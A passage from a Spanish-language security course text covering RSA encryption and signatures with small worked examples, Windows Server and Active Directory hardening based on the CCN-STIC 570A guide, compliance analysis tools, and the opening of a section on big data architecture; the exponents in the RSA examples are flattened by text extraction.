secreto p y q, que le servirá para acelerar la operación de descifrado mediante
el Teorema Chino del Resto.
A continuación, se muestra un ejemplo con números pequeños de este proceso:
• Alicia elige como primos los valores p = 7 y q = 17, con lo que su módulo de
cifra será n = 7·17 = 119 y su cuerpo trampa Φn = (7 - 1)*(17 - 1) = 6*16 = 96.
• Elige como clave pública e=5 ya que mcd (5,96)=1.
• Calcula su clave privada d = inv (5, 96) = 77.
CIFRANDO Y DESCIFRANDO CON RSA
Si Alicia desea enviar el número secreto N (con confidencialidad) a Bernardo, realizará las
siguientes operaciones. Como Alicia conoce la clave pública de Bernardo n y e, calcula
Ne mod n = C, enviando a Bernardo este criptograma C. Dado que Bernardo es el único
que conoce su clave privada d, solo él podrá realizar la siguiente operación: Cd mod n.
Observa que Cd mod n = [Ne mod n]d mod n = [Ne]d mod n. Puesto que en la operación
[Ne]d mod n los exponentes se anulan entre sí porque son inversos en Φn, en recepción
Bernardo recuperará el mensaje secreto N enviado por Alicia dentro del cuerpo n.
Por ejemplo, conociendo que los valores públicos de la clave anterior de Bernardo son n
= 143 y e = 7, Alicia le enviará el valor secreto N = 75. Como la clave privada de Bernardo
era d = 103, se procede entonces así:
• Alicia calcula 757 mod 143 = 114, que envía a Bernardo.

• Bernardo calcula 114 103 mod 143 = 75, y recupera el secreto.
FIRMANDO CON RSA Y COMPROBANDO LA FIRMA
Si Alicia desea enviar un mensaje H (posiblemente un hash) firmado a Bernardo, con

su clave privada d va a realizar la siguiente operación Hd mod n = S, enviando en ese
criptograma S su firma. Dado que Bernardo conocerá la clave pública de Alicia, n y e (y
todos los que la conozcan) podrá realizar la siguiente operación: Se mod n = H.
Observa que Se mod n = [Hd mod n]e mod n = [Hd]e mod n. Como en la operación [Hd]
e mod n los exponentes se anulan entre sí entregando el valor 1 como ya hemos visto,
Bernardo recupera el mensaje H firmado por Alicia dentro del cuerpo n.

Como ya se ha comentado, en los sistemas de cifra asimétricos como es el caso de RSA,
en la práctica solo se cifrarán números y además valores relativamente pequeños, de
unas centenas de bits. Por tanto, una firma digital se realizará sobre un número, resultado
de aplicar una función hash a un archivo ya de cualquier tamaño y tipo.
Los pasos a realizar en la firma digital con RSA a través de un hash serán:
• Alicia obtiene la función hash h(M) = H del archivo M que desea firmar.
• Sobre ese hash H, Alicia realizará la firma usando su clave privada d.
• Alicia calcula Hd mod n = S y le envía a Bernardo la dupla mensaje y firma (M,
S).
• Bernardo recibe (M’, S) pues no se sabe si recibe el mismo mensaje M o un
mensaje distinto o falso M’.
• Bernardo realiza la siguiente operación con la clave pública de Alicia: Se mod
n = [Hd mod n]e mod n = H.
• Es decir, recupera el valor H = h(M) que usó Alicia para su firma en el momento
de emisión.
• Bernardo calcula la función hash h(M’) del mensaje M’ recibido, que puede ser
el verdadero mensaje M u otro distinto M’.
• Si el hash calculado en recepción coincide con el hash recuperado y firmado
en emisión, se acepta la firma como correcta; en caso contrario se rechaza
la firma.
Si desea a firmar un documento M cuyo hash h(M) es el valor 46, se usará la clave privada
d = 77 y su cuerpo de cifra n =119. En recepción, Bernardo, o quien conozca la clave pública
e = 5 y n = 119 de Alicia, podrán comprobar dicha firma. Se procede en este caso así:
• Alicia calcula 4677 mod 119 = 65, que envía a Bernardo.
• Bernardo calcula 655 mod 119 = 46, y comprueba la firma.
CIFRANDO MENSAJES CON RSA

Puesto que los sistemas de cifra con clave pública tienen una velocidad de cifra en torno
a los cientos de Kilobytes por segundo, muy lenta si la comparamos con la velocidad
de los sistemas de cifra con clave secreta que está en los cientos de Megabytes por
segundo (mil veces más rápidos), los primeros se usarán preferentemente para cifrar
números de solo unas pocas centenas de bits. Por lo tanto, aunque podemos codificar
el mensaje M con la codificación que se nos ocurra (código ASCII decimal, por ejemplo)
para transformar esa información a un conjunto a números y usar luego RSA para cifrar
esa cadena de valores, en la práctica no tiene sentido hacerlo por esa velocidad tan baja.
En el vídeo, Cifrado asimétrico utilizando software educativo, se muestra el uso de RSA
para cifrar, firmar y verificar la firma con números pequeños y software educativo de
modo que se facilite la comprensión del algoritmo en sí.

10. Introducción a la
seguridad en Windows
server y trabajo en máquinas
virtuales.
10.1. Seguridad en Windows Server.
NOVEDADES DE SEGURIDAD
El sistema operativo Windows Server 2016 incluye novedosas herramientas para abordar
vulnerabilidades de seguridad y prevenir ataques al sistema. Además, si un usuario no
autorizado ingresa en el entorno del dominio, un nuevo nivel de seguridad integrado en el
sistema operativo limita el daño que los usuarios pueden crear y ayuda en la detección
de actividades maliciosas.
Una de las más importantes innovaciones relativas a seguridad es una característica
única llamada Máquinas virtuales blindadas. Esto posibilita que la máquina virtual se cifre
con BitLocker y se ejecute solo en máquinas confiables y autorizadas por su servicio de
protección. Otra característica novedosa de Windows Server 2016 es un modo de ejecución
seguro llamado Virtual Secure Mode (VSM), que utilizan muchos componentes, incluida
la protección de credenciales, que crea regiones aisladas de memoria para procesos en
una partición segura virtualizada. Otras novedades de seguridad que incluye Windows
Server 2016, según STIC 570A (2018), son las presentes en la Tabla 1.
(TABLA)
Windows Server 2019 ofrece las siguientes novedades de seguridad:
Protección avanzada contra amenazas de Windows Defender (ATP). Tiene un sensor
de amenazas que detecta ataques a nivel de memoria y kernel y responde eliminando
archivos y procesos sospechosos y maliciosos.
Seguridad con redes definidas por software (SDN). La seguridad en redes SDN, en las
instalaciones o en la nube, ofrece muchas funciones para fomentar la confianza del
cliente en la ejecución de lotes de trabajos.
En Windows server 2022 se incorporan las siguientes medidas de seguridad:
Secured-core server: aprovechan al máximo las capacidades del hardware, firmware
y sistema operativo para protegerlo de las amenazas. La protección habilitada por un

servidor Secured-core crea una base sólida para los datos críticos y las aplicaciones que
se utilizan en ese servidor.
Hardware root-of-trust: viene con el servidor Secured-core y proporciona almacenamiento
seguro para datos confidenciales y claves, como permisos para monitorizar y medir los
componentes cargados en el momento del arranque Trusted Platform Module 2.0 (TPM
2.0).
Firmware protection: según informes recientes, las plataformas de malware y ransomware
agregan funciones de software y aumentan el riesgo de ataques dirigidos a los recursos
de firmware corporativos, como los controladores de dominio de Active Directory. El
sistema Secured-core aísla la seguridad crítica del hipervisor de dichos ataques con la
ayuda de los procesadores compatibles con la tecnología Dynamic Route Measurement
Trust (DRTM) y la protección DMA.
Virtualization-based security (VBS): los servidores secured-core incluyen VBS e integridad
de código basada en hipervisor (HVCI). VBS y HVCI protegen contra todo tipo de
vulnerabilidades que suelen ser foco de los ataques de minería de criptomonedas,
debido al aislamiento proporcionado por VBS entre las partes privilegiadas del sistema
operativo, como el kernel y el resto del sistema. VBS también ofrece más funciones que
los clientes pueden usar, como la protección de credenciales, para mejorar su protección
en el dominio.
Transport HTTPS and TLS 1.3: habilitado por defecto en todas las conexiones.
Secure DNS: Solicitudes de resolución de nombres DNS encriptadas con DNS sobre HTTPS.
Server Message Block (SMB): Windows Server admite conjuntos de cifrado
AES256GCM y AES256CCM para cifrado y firma SMB. Windows lo negocia automáticamente
cuando se conecta a otra computadora que admita este cifrado más alto. También se lo
puede aplicar mediante la política de grupo. Windows Server seguirá admitiendo AES128
para un bajo nivel de compatibilidad.
10.2. Seguridad en Active Directory. Políticas base.

DOMINIO DE DIRECTORIO ACTIVO
Windows Active Directory es un servicio que posibilita que las aplicaciones encuentren,
usen y administren los recursos hardware y software del dominio. Al planificar y diseñar su
infraestructura de Active Directory se deben analizar las medidas de seguridad que se le
pueden aplicar. Dos cosas son especialmente importantes al implementar estas pautas
de configuración: Unidades organizativas y políticas de dominio agrupadas por GPO.
INFRAESTRUCTURA DE UNIDADES ORGANIZATIVAS

El principal objetivo del diseño de una unidad organizativa (OU) es crear una política
de grupo coherente en todos los servidores, lo que permite a los usuarios que residen
en el servicio de directorio responder y cumplir con los procedimientos y estándares de
seguridad de la organización. Según se especifica en STIC 570A (2018):

«a) Nivel de Dominio. Para cumplir los requisitos comunes de seguridad, tales
como directivas de cuenta y de contraseñas que deben ejecutarse en todos los
servidores del dominio.
b) Nivel de Referencia. Para cumplir los requisitos de seguridad específicos del
servidor que son comunes a todos los servidores miembros del dominio.
c) Nivel de Rol. Para cumplir los requisitos de seguridad de los roles específicos
del servidor. Por ejemplo, los requisitos de seguridad de los servidores de
infraestructura son distintos de los de los servidores que ejecutan Internet
Information Services (IIS)» (p. 18) FOTO
El diseño basado en OUs y directivas/políticas de grupo garantiza que los servidores

y máquinas de usuario de la empresa usen de forma coherente la configuración de
seguridad estándar. Además, tanto la estructura de OU como la aplicación de la política
de grupo deben posibilitar configuraciones de seguridad para servidores concretos en la
organización a través de un diseño detallado.
Primero se configuran OUs para los diferentes roles de servidor, estas están anidadas dentro
de las OUs correspondientes a los servidores miembro, sin embargo, los controladores
de dominio tienen sus propias OUs. Para ello, primero se debe crear una política de
grupo de referencia siendo necesario utilizar la configuración base (modelo-plantilla) de
seguridad de referencia «CCN-STIC-570A Member Server.inf» y asociarlo a la política
de seguridad, Group Policy Objects (GPO), aplicada en la OU «Servidores Miembro». La
política de grupo a la que se hace referencia debe incluir la configuración necesaria para
cada uno de los servidores de la organización y debe ser lo más restrictiva en todos los
parámetros generales.
Los roles de servidor que deben diferir de esta política deben incluirse en unidades
organizativas de servidor específicas. Siguiendo con lo que se mostró anteriormente, debe
crearse otra política de grupo para acomodar gradualmente cada uno de los diferentes
roles de servidor que puedan existir en la empresa. Al asignar estos roles desde la OU del
servidor miembro a la unidad organizativa de tipo nivel, los cambios son acumulativos, la
gestión de la política de seguridad se simplifica y todos los equipos miembros se aplican
de forma coherente.
Se pueden seguir varios métodos a la hora de crear una estructura lógica de Active
Directory. Sin embargo, se recomienda adoptar este método, ya que será la base utilizada
en todos los tutoriales de la colección CCN-STIC 500. En la serie de guías desarrolladas
para diferentes productos todos los archivos de plantilla incrementales deben aplicarse
a OUs que sean de menor nivel que la de los servidores miembro.
Por lo tanto, como se vio en el ejemplo, a cada una de estas unidades organizativas
de nivel inferior se le debe aplicar el archivo CCN-STIC- 570A Member Server.inf y un
archivo incremental específico para definir el rol de cada unidad en la organización. Los
requisitos de seguridad para cada función/rol de servidor son diferentes. De las muchas
funciones/roles que puede tener el servidor, el DC es fundamental ya que las cuentas
de estos servidores no están en unidades organizativas de menor nivel que el de las
unidades organizativas del servidor miembro. En su lugar, se ubicarán en el contenedor
de controlador de dominio.

Por este motivo, se crea una política incremental específica para el DC, que implementa
el modelo CCN-STIC-570AControladorDomain.inf en el supuesto de una red clasificada.
DIRECTIVAS DE CUENTA
Las directivas de cuenta relacionadas a continuación se aplican a cada una de las
cuentas de usuarios, servicios y administradores pertenecientes a un dominio.
DIRECTIVA DE CONTRASEÑAS
Una contraseña segura que se cambia con frecuencia reduce las posibilidades de un
ataque exitoso. La configuración de la política de contraseñas controla la solidez y la
vigencia de esta. Esta sección describe la configuración específica para la política de
contraseñas. Estas directrices también deben usarse para las contraseñas de todas
las cuentas de servicio de la organización. Las políticas de contraseña definidas en la
política de dominio afectan las cuentas de usuario en ese dominio Active Directory. Estos
parámetros se pueden encontrar en el complemento Plantillas de seguridad en: a)
Directiva de cuenta\Directiva de contraseñas.
La creación de requisitos estrictos de longitud y complejidad de la contraseña no significa
necesariamente que esta sea segura para los usuarios y administradores. La habilitación
de políticas de contraseñas permite a los usuarios del sistema cumplir con los requisitos
de complejidad técnica para estas definidas por el sistema, pero los malos hábitos
requieren políticas de seguridad adicionales. Por ejemplo, «Cualquiera01» puede cumplir
con los criterios de dificultad de la contraseña, pero no es demasiado complicado de
determinar.
Según el Centro Criptológico Nacional en STIC 570A (2018) cada organización debe
establecer pautas de seguridad para crear contraseñas adecuadas, como:
«a) Evitar el uso de palabras que figuren en un diccionario, palabras
con faltas de ortografía comunes o juegos de palabras y palabras
extranjeras. b) Evitar utilizar contraseñas a las que se le añade un dígito
simplemente. c) Evitar utilizar contraseñas que otros puedan adivinar
fácilmente viendo su escritorio o bien por ingeniería social (como los
nombres de sus mascotas, equipos deportivos y familiares). d) Evitar
pensar en las contraseñas como palabras propiamente dichas, hay
que pensar en códigos secretos. e) Deben emplearse contraseñas
que requieran escribir con ambas manos en el teclado. f) Deben
usarse letras mayúsculas y minúsculas, números y símbolos en todas
las contraseñas. g) Deben usarse espacios y caracteres que solo se
pueden producir utilizando la tecla «Alt»».
Adicionalmente a la política de contraseñas anterior, se puede requerir una gestión
centralizada de todos los usuarios. Para impedir que un usuario cambie su contraseña,
excepto cuando se le solicite, el usuario puede renovarlas dentro de los intervalos mínimos
y máximos de contraseñas. No obstante, para diseñar un entorno altamente seguro solo
necesita cambiarla si el sistema operativo le notifica después de unos días, según lo

determinado por el campo Duración Máxima de la contraseña.
También, se puede deshabilitar la opción Cambiar contraseña mediante las opciones
que aparecen cuando presionan las teclas CTR-ALT-SUPR. Es posible aplicar esta
configuración en un dominio completamente mediante la directiva de grupo o editando
el registro de cualquier usuario específicamente. Se describe también cómo utilizar la
función de Política de contraseña específica (FGPP) para configurar diferentes políticas
de contraseña según el tipo de usuario o función/rol.
DIRECTIVA DE BLOQUEO DE CUENTAS
La política de bloqueo de cuenta controla que, después de varios intentos fallidos de

autenticación durante un tiempo determinado, se bloquee la cuenta de un usuario. El
usuario no podrá volver a intentar iniciar sesión con una cuenta en estado bloqueada.
Para paliar este tipo de ataque se puede desactivar la cuenta después de varios intentos
de autenticación fallidos. Estas configuraciones de directivas de bloqueo pueden evitar
que los atacantes adivinen contraseñas y reducen las posibilidades de ataques exitosos
en el dominio. La directiva de bloqueo de cuenta se puede encontrar en el archivo adjunto
de la Plantilla de seguridad en la siguiente ubicación: a) Directiva de cuenta\Directiva
de bloqueo de cuenta.
El establecimiento de una política de bloqueo de cuenta restrictiva mejora la seguridad
del dominio, pero además puede aumentar la carga administrativa relacionada con el
desbloqueo de cuentas de usuario. Debe tenerse en cuenta que la política de bloqueo
de cuentas podría evitar que un atacante que conozca el nombre de la cuenta realice
múltiples inicios de sesión falsos y bloquee el acceso de usuarios legítimos posibilitando
ataques de denegación de servicio (DOS-DDOS).
Se debe considerar que la única cuenta que no tiene esta protección es la cuenta de
administrador. Deberá cambiar el nombre de esta cuenta para evitar ataques maliciosos.
Al igual que con las contraseñas, puede utilizar funciones específicas de política de
contraseñas (FGPP) para obtener un mayor control sobre el sistema de bloqueo de su
cuenta.
DIRECTIVA KERBEROS
Las directivas relacionadas con el protocolo Kerberos son necesarias para autenticar y
autorizar a los usuarios en el dominio. Dichas políticas definen parámetros relativos a
la versión 5 del protocolo Kerberos, como la duración del ticket y su cumplimiento. Las
directivas del protocolo Kerberos no se configuran en las directivas locales. Al reducir la
validez de los tickets de Kerberos, se reduce la posibilidad de que un atacante se haga
con una contraseña y pueda suplantar una cuenta de usuario legítima. Se recomienda
no cambiar los valores predeterminados de estos criterios, aunque pueden ser más
restrictivos. Estos parámetros se establecen en el complemento Plantilla de seguridad en
la siguiente ubicación: a) Directivas de cuenta\Directiva Kerberos.

DIRECTIVAS LOCALES
Opciones de seguridad
Algunas directivas correspondientes a las opciones de seguridad también actúan como

políticas y directivas de cuenta y se deben considerar a nivel dominio para que se
apliquen y añadan protecciones adicionales a las cuentas del dominio. Estos parámetros
se configuran dentro del complemento Plantillas de Seguridad en la siguiente ubicación:
a) Directivas locales\Opciones de seguridad.
Las siguientes directivas requieren aclaraciones adicionales por su importancia:
• Acceso de red: traducción SID/nombre anónimo. Al habilitar esta política en el
DC, los usuarios que conocen el atributo SID de administrador pueden iniciar
sesión en otros equipos que tengan esta política habilitada y usar ese SID
conocido para obtener el nombre de administrador. Ese atacante puede usar
el nombre obtenido para lanzar un ataque y averiguar la contraseña.
• Seguridad de red: relativo a la configuración, habilitación de los tipos de
cifrado permitidos para Kerberos.
REGISTRO DE EVENTOS
Los eventos del sistema y de la aplicación se registran en el Registro de eventos. Los
registros de seguridad registran y archivan los eventos de auditoría. El contenedor Registro
de eventos del modelo-plantilla de seguridad define las propiedades relacionadas con los
registros de eventos del sistema, aplicaciones y seguridad, como el tamaño del registro,
la firma máxima, los derechos de usuario, el acceso a cada registro, la configuración y los
métodos de guardado, etc.
La configuración del registro de eventos relativos al sistema, seguridad y aplicaciones se
configura en la política básica para aplicarse a todos los miembros del dominio. Luego,
hay que crear políticas específicas para diferentes roles de servidor dentro de cada
unidad organizativa. El conjunto de parámetros relativos al registro de eventos mediante
el complemento Plantillas de seguridad residen en: a) Registro de eventos.
CONTROLADOR DE DOMINIO Y SERVIDOR MIEMBRO

Los DC, junto con los servicios DNS, son clave para proporcionar funcionalidad a la
infraestructura de Active Directory. La seguridad de una organización depende en
gran medida de estos. Por lo tanto, se requiere establecer un alto nivel de seguridad
para estos roles. Esta sección contiene la configuración de seguridad requerida para
su DC. Un determinado dominio puede contener distintos servidores que actúan como
controladores de dominio. La mayor parte de las configuraciones de esta sección debe
crearse solo una vez, con independencia del número de controladores de dominio que
hubiese.
Dada la importancia de los datos almacenados, los controladores de dominio siempre

deben almacenar esos datos en una ubicación físicamente segura a la que solo puedan
acceder los administradores calificados. La función de DC no debe combinarse con otros
servicios que una organización pueda proporcionar, a menos que sea absolutamente
necesario, como cuando la infraestructura tiene un solo servidor. Asimismo, esta sección
también describe los requisitos para los servidores miembros que también requieren
seguridad porque no son controladores de dominio, pero desempeñan un papel diferente
dentro de la organización.
PLANTILLA DE SEGURIDAD
Los criterios definidos anteriormente establecen parámetros comunes que deben
aplicarse en todo el dominio. Sin embargo, se recomienda que se establezca una
configuración específica en el nivel de función/rol de cada sistema. Esta sección define
configuraciones de seguridad adicionales para controladores de dominio y servidores
miembro que ejecutan Windows Server. Para los controladores de dominio se debe definir
un nuevo patrón incremental específico para que no cambie el GPO predeterminado.
Política de DC predeterminada proporcionada por Microsoft. Sin embargo, el nuevo GPO
tiene prioridad sobre el GPO establecido por Microsoft como DC predeterminado, ya que
consta de varios pasos.
Estas configuraciones asumen que el dominio está configurado como se describe en
la sección de Active Directory. El equipo servidor miembro especificado tiene un GPO
adicional, además del GPO aplicado al dominio, que le permite establecer la seguridad
en el equipo y el DC.
DIRECTIVAS DE CUENTA
Las políticas de cuenta relacionadas con las cuentas de dominio ya están definidas a
nivel de dominio, por lo que no es requerido definir adicionalmente ninguna configuración
en este conjunto de políticas a menos que se requiera una configuración adicional.
DIRECTIVAS LOCALES
• Directivas de auditoría. Las políticas de auditoría definen los eventos de
seguridad que se generan para monitorizar y registrar la actividad de los
usuarios o del sistema. Los administradores pueden monitorear las actividades
relacionadas con la seguridad, como quién está accediendo al objeto, si el usuario
está conectado o desconectado de la computadora y si se han cambiado las
configuraciones de auditoría. Los valores de la política de auditoría se pueden
encontrar en el archivo adjunto de la plantilla de seguridad en: a) Directivas
locales\Directiva de auditoría
• Asignación de privilegios de usuario. Es necesario gestionar con el Principio
de mínimos privilegios los permisos de cada usuario o grupo en función de la
necesidad que tengan de conocer de los recursos del dominio distribuidos en
diferentes servidores. Se otorgan permisos para realizar acciones específicas,
como iniciar una red o sesión local, y para tareas administrativas, como

generar un nuevo token de acceso. Los permisos de usuario se establecen en
el complemento Plantillas de seguridad en: a) Directivas locales\Asignación de
derechos de usuario.
Algunos parámetros para configurar según la guía STIC 570A (2018) son:
«a) Denegar el acceso a este equipo desde la red.
b) Denegar el inicio de sesión a través de Servicios de Escritorio remoto.
c) Habilitar confianza con el equipo y las cuentas de usuario para delegación.
d) Tener acceso a este equipo desde la red»
Opciones de seguridad. Como indica STIC 570A (2018), permiten configurar entre otros:
«a) Cuentas: Configuraciones adicionales a las directivas de cuenta.
b) Auditoría: Configuraciones adicionales a las directivas de auditoría
c)DCOM: Configuraciones para el modelo de objetos de componentes
distribuidos.
d) Dispositivos: Configuraciones para la conexión y desconexión de dispositivos
en el equipo, así como acciones realizadas sobre los mismos.
e) Controlador de dominio: Configuraciones específicas para los controladores
de dominio.
f) Miembro de dominio: Configuraciones para equipos pertenecientes a un
dominio.
g) Inicio de sesión: Configuraciones para definir acciones sobre el inicio de
sesión en los equipos.
h) Cliente de red Microsoft: Configuraciones para establecer las comunicaciones
entre equipos clientes.
i) Servidor de red Microsoft: Configuraciones para establecer las
comunicaciones entre equipos servidores.
j) Acceso a la red: Configuraciones para definir acciones sobre los accesos a
la red.
k) Seguridad de red: Configuraciones sobre aspectos de protocolos en red.
l) Consola de recuperación: Configuraciones para determinar acciones a
poder realizar sobre la consola de recuperación.
m) Apagar: Configuraciones para definir el apagado del equipo.
n) Criptografía: Configuraciones acerca de algoritmos a utilizar.
o) Objetos del sistema: Configuración para distinción de mayúsculas y
minúsculas, así como el refuerzo sobre los permisos de objetos de Windows.
p) Configuración del sistema: Configuración para compatibilidades y
procesamiento de certificados.
q) Control de cuentas de usuario: Configuraciones para establecer el
comportamiento de la UAC.» .
Como se mencionó anteriormente, es necesario definir una política de grupo que tenga

mayor nivel de prioridad sobre la política configurada de forma predeterminada. Estas
directivas deben ser siempre más restrictivas para no afectar la seguridad establecida
por la política predeterminada. Las opciones de seguridad se definen en el complemento
Plantilla de seguridad en: a) Directivas locales\Opciones de seguridad.
SERVICIOS DEL SISTEMA

En Windows Server se encuentran disponibles servicios opcionales adicionales, como
el denominado «Servicio de certificados de Active Directory». Este servicio no viene en
la instalación predeterminada de Windows Server. Puede agregar servicios a su sistema
activando manualmente cualquier roles o característica que se considere necesaria. Se
puede usar la Consola de Administración del servidor o cmdlets de PowerShell para
automatizar. Todos los servicios o aplicaciones son puntos potenciales de ataque.
Es importante que los servicios o ejecutables no deseados se desactiven o eliminen. El
modelo de seguridad asociado con estas directrices tiene esto en cuenta y deshabilita
así los servicios que no se consideran necesarios para el funcionamiento normal. Si se
necesita habilitar servicios deshabilitados a través del GPO, en este tutorial en algunos
DC o servidores miembro se debe cambiar el modelo incremental de controladores de
dominio o servidores miembro. Sin embargo, hay que evaluar el impacto de habilitar un
servicio y asegurarse de que estará siempre actualizado. Tener en cuenta que Microsoft
puede agregar nuevos servicios que deben configurarse correctamente. Este tutorial
asume que los roles Active Directory y Servidor DNS están activos en el servidor del DC, ya
que este último generalmente está asociado con el primero. La configuración del servicio
del sistema se puede cambiar utilizando el complemento Plantillas de seguridad en: a)
Servicios del sistema.
REGISTRO
El modelo-plantilla de seguridad posibilita aplicar permisos más restrictivos al registro
del servidor. Generalmente, la seguridad predeterminada del registro de Windows
Server es suficiente, incluso si se requieren cambios. Los permisos de registro se pueden
configurar mediante el complemento Plantillas de seguridad en la siguiente ubicación: a)
Registro.
OTRAS RECOMENDACIONES DE SEGURIDAD

Algunas configuraciones adicionales no se pueden implementar en esta sección utilizando
los modelos de seguridad descritos. Algunos de ellos no se implementan de acuerdo con
las instrucciones del tutorial, pero se describen aquí en caso de que el administrador
decida ejecutarlos.
Firewall de Windows con seguridad avanzada
Windows Server incluye un firewall nativo que posibilita definir reglas de filtro para
permitir o denegar el tráfico de red hacia y desde el servidor. Esta función de firewall se
denomina «Firewall de Windows con seguridad avanzada» y se configura en la consola

de administración de Server Administrator mediante netsh (netsh advfirewall) desde la
línea de comandos. También se puede configurar mediante un objeto de directiva de
grupo (Configuración del equipo-Directivas-Configuración de WindowsConfiguración
de seguridad-Firewall de Windows con seguridad avanzada). Un descripción precisa de
todas las opciones de configuración de seguridad avanzadas está fuera del alcance de
este documento.
Como se encuentra en el manual STIC 570A (2018), las reglas y políticas de firewall se
agrupan en tres perfiles, por lo que para cada conexión de red solo se aplica la que
coincide con uno de los perfiles en un momento dado:
«a) Dominio: Se aplica cuando el servidor tiene conectividad con un controlador
de dominio a través de esa interfaz de red.
b) Privado: Se aplica cuando el servidor no tiene conectividad con un
controlador de dominio y la red a la que está conectado ha sido categorizada
como privada por el administrador.
c) Público: Se aplica cuando el servidor no tiene conectividad con un controlador
de dominio y la red a la que está conectado no ha sido categorizada por el
administrador, o ha sido categorizada como red pública».
Cada perfil define una política predeterminada que se colocará a los paquetes de red que
se apliquen al perfil si dichos paquetes no tienen reglas de filtrado específicas. Se pueden
especificar diferentes opciones para conexiones entrantes y salientes. Le recomendamos
que utilice la siguiente configuración para todos los perfiles según indica STIC 570A
(2018):
«a) Conexiones entrantes: Bloquear las conexiones entrantes que no coincidan
con una regla.
a) Conexiones salientes: Permitir las conexiones salientes que no coincidan
con una regla» .
En esta configuración, debe permitir todas las conexiones de red al servidor y definir reglas
de filtrado para las conexiones entrantes dirigidas a los servicios que deben ser realmente
accesibles en la red. Por ejemplo, para permitir que los clientes realicen consultas de DNS
en el servidor las reglas de firewall deben permitir conexiones entrantes directas al puerto
53 / UDP si el servidor desempeña esta función.
Windows Server incluye un conjunto de reglas de forma predeterminada cuando se
instala sin una función o característica. La instalación real de la función o función incluye
la creación automática de las reglas necesarias para esta función o los servicios de red
proporcionados por estas funciones.
En general, estas reglas generadas automáticamente son muy seguras, pero debe
verificarlas y deshabilitar las innecesarias. Por ejemplo, si su servidor no tiene IPv6
habilitado, puede deshabilitar todas las reglas de firewall que permiten el tráfico IPv6. Si
no está utilizando DHCP, puede deshabilitar cualquier regla que permita el tráfico DHCP.
Las instrucciones paso a paso (CCNSTIC570A anexo A), que incluyen la configuración del
modelo-palantilla de seguridad, muestran la configuración recomendada para el Firewall
de Windows con seguridad mejorada para los controladores de dominio y los servidores
miembro en cada entorno.
Estas configuraciones de firewall recomendadas se incluyen como una directiva de
firewall (archivo con la extensión «.wfw») que puede importar a su computadora o a un

objeto GPO. Las instrucciones (CCNSTIC570A anexo A) cubren los pasos necesarios para
aplicarlas a través del GPO.
DESACTIVACIÓN DE PROTOCOLOS INNECESARIOS

Con el objetivo de reducir aún más la superficie de ataque se deben deshabilitar todos
aquellos protocolos de red que no sean estrictamente necesarios.
CUENTAS DE SERVICIO
No configurar un servicio para que se ejecute en el contexto de seguridad de cualquier
cuenta de dominio a menos que sea necesario de forma imprescindible. Si su servidor
está físicamente comprometido, puede obtener fácilmente la contraseña de su cuenta
de dominio obteniendo el secreto de la Autoridad de seguridad local (LSA). Si necesita
iniciar el servicio con una cuenta de dominio, le recomendamos que utilice la cuenta de
servicio administrada que se vio con anterioridad.
SEGURIDAD WINDOWS 10 CLIENTE MIEMBRO DE DOMINIO

Para mejorar la seguridad de los clientes con sistema operativo Windows 10 en un dominio
se recomienda aplicar el anexo de la guía CCN-STIC-599A19 ENS incrementa clientes
categoría básica. Aplicada a las correspondientes OU que albergan los clientes de la
organización, se pueden configurar de forma específica medidas relativas al control de
acceso (identificación, requisitos de acceso, mecanismos de autenticación, etc.), registro
de la actividad de los usuarios, asignación de derechos de usuario, opciones de seguridad
de control de cuentas de usuario, etc.
10.3. Analizadores de políticas base.

El Security Compliance Toolkit (SCT), dice Montemayor (2021), «es un conjunto de
herramientas que permite a los administradores de seguridad empresarial descargar,
analizar, probar, editar y almacenar las líneas base de configuración de seguridad
recomendadas por Microsoft para Windows y otros productos de Microsoft. SCT permite
a los administradores administrar eficazmente los objetos de directiva de grupo (GPO)».
Los administradores utilizan el kit de herramientas para comparar con los GPO actuales
de Microsoft u otras líneas base recomendadas, modificarlos, guardarlos en el formato
de archivo de copia de seguridad de GPO y aplicarlos juntos mediante Active Directory o
se pueden aplicar individualmente mediante directivas locales.

Policy Analyzer es una utilidad para analizar y comparar colecciones de objetos de
directiva de grupo (GPO). Sus principales características según Dansimp (2021), son:
«-Resaltar cuando un conjunto de directivas de grupo tiene una configuración

redundante o incoherencias internas.
-Resaltar las diferencias entre las versiones o los conjuntos de directivas de
grupo.
-Comparar los GPO con la directiva local actual y la configuración del registro
local.
-Exportar los resultados a una hoja de cálculo de Microsoft Excel».
El analizador de políticas le permite tratar un conjunto de GPO como una sola unidad. Esto
facilita la determinación de si ciertos valores se repiten en el GPO o si se definen como
valores en conflicto. También puede utilizar el analizador de políticas para capturar una
línea de base y compararla con una instantánea que tome más tarde para identificar
cambios en cualquier parte del conjunto.
10.4. Herramientas de análisis de configuración de

seguridad.
La herramienta Clara permite analizar las características técnicas de seguridad
identificadas por el Real Decreto 3/2010, que regula el régimen de seguridad nacional para
la gestión electrónica. El análisis de cumplimiento basado en estándares se proporciona
a través de los modelos de seguridad CCNSTIC 850A, 850B, 851B, 870A, 870B, 570A, 570B,
599A18, 599B18, 599A19, 599B19, 619 y 619B.
Hay que tener en cuenta que las áreas de aplicación de este tipo de modelos son tan
diferentes que la especificidad y funcionalidad de los servicios que ofrecen las distintas
organizaciones depende de su aplicación. Como resultado, se han creado modelos
y estándares de seguridad para definir principios generales de seguridad para el
cumplimiento de los valores mínimos establecidos en ENS.
Sin embargo, algunas organizaciones deben tener en cuenta que las plantillas definidas
pueden haber sido modificadas para adaptarse a sus necesidades operativas.
Esta aplicación incluye CLARA ENS (versiones de 32 y 64 bits) para análisis independientes en
un entorno Microsoft Windows y CLARA ENS-LINUX para un entorno Linux. La herramienta de
escaneo de cumplimiento funciona solo en sistemas Windows y Linux, independientemente
de las versiones de cliente y servidor, miembros de dominio o dominios.

11. Big Data y Cloud
Computing.
11.1. Arquitecturas Big Data
MODELO DE ARQUITECTURA BIG DATA DEL NIST
El modelo conceptual y de referencia de arquitectura de big data, NIST Big Data Reference
Arquitecture (NBDRA), que propone el NIST se muestra en la Figura 1 y representa un sistema
de big data compuesto por cinco componentes funcionales y lógicos, conectados por
interfaces de interoperabilidad (es decir, servicios). Dos capas envuelven los componentes,
representando la naturaleza entrelazada de la gestión y la seguridad y privacidad con los
cinco componentes.
El modelo NBDRA pretende permitir a los ingenieros de sistemas, científicos de datos,

desarrolladores de software, arquitectos de datos y responsables de la toma de decisiones
de alto nivel desarrollar soluciones a cuestiones que requieren diversos enfoques debido
a la convergencia de las características de big data dentro de un ecosistema de big data
interoperable.
Proporciona un marco para apoyar una gran variedad de entornos empresariales,

incluidos los sistemas empresariales estrechamente integrados y entornos verticales
poco acopladas, mediante la mejora de la comprensión de cómo big data complementa
